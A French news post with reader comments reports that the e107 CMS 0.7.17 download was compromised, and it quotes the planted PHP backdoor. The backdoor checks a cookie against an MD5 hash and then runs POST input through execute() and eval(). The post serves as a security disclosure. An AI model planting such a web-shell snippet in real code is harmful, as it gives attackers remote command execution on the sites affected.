La dernière version du SGC e107 est backdoorée
Son lien de téléchargement est compromis

Le , par Katleen Erna, Expert éminent sénior
La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis

Certains d'entre vous utilisent peut être le système de gestion de contenu open source e107 pour créer ou gèrer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose régulièrement de nouveaux téléchargements et mises à jour.

Il semblerait que sa dernière version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.

Un spécialiste en sécurité informatique ayant téléchargé le fichier a découvert l'entrée suivante à la ligne numéro 1876 de son code source :

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

(etc.)

Le lien de téléchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus télécharger le fichier en l'attente de leur réponse au problème.

Plus d'informations ici.


Vous avez aimé cette actualité ? Alors partagez-la avec vos amis en cliquant sur les boutons ci-dessous :


 Poster une réponse

Avatar de supertonic supertonic - Membre habitué https://www.developpez.com
le 27/01/2010 à 9:55
Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?
Avatar de trenton trenton - Membre confirmé https://www.developpez.com
le 27/01/2010 à 10:02
Citation Envoyé par supertonic  Voir le message
Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

Non
Avatar de ixpe ixpe - Membre actif https://www.developpez.com
le 27/01/2010 à 10:05
Citation Envoyé par supertonic  Voir le message
Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

Oula...
Non il s agit d un code inseré par une personne malveillante dans les sources du cms...

Je l aime bien pourtant ce petit cms... Pas tres connu, je le pensais donc
plus ou moins a l abri des objectifs des pirates.
Avatar de khayyam90 khayyam90 - Responsable Portail https://www.developpez.com
le 27/01/2010 à 10:06
La faille vient du code en téléchargement.
Quiconque installe cette nouvelle version permettra à un attaquant bien informé (qui aura connaissance du cookie à nommer access-admin) d'exécuter directement du code système ou php sur son site.
Une rapide recherche de base de données md5 ne m'a pas indiqué la valeur à positionner dans cookie.

Grosse grosse faille de sécurité.
Avatar de bombseb bombseb - Membre éclairé https://www.developpez.com
le 27/01/2010 à 11:04
il est sympas ce CMS mais il m'a pas l'air tres sécure...

je l'avais installé il y a un moment déja et on me l'avait déja hacké à l'époque...
Avatar de kaymak kaymak - Membre chevronné https://www.developpez.com
le 27/01/2010 à 12:56
Encore un bel exemple de propagation par les équipes de développement. Qui n'ont pas fait cela exprès.
C'est juste un des mecs ou des serveurs d'hébergement qui s'est fait infecté involontairement et qui par rebond a contaminé son projet : /

Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation.

Fin, faut tout de même patcher sa release pour ceux qui ont upgradé, plus encore ceux qui sont en serveur dédié, ou autre rps / vps.
Offres d'emploi IT
Architecte JEE orienté Finance H/F
Talan - Ile de France - Paris (75008)
Front-end developer #angular #react #ecommerce
MATIERE GRISE - Ile de France - Paris (75000)
Software Development Engineer - AeTM Product User Interface
Amadeus - Provence Alpes Côte d'Azur - Sophia-Antipolis

Voir plus d'offres Voir la carte des offres IT
Contacter le responsable de la rubrique Accueil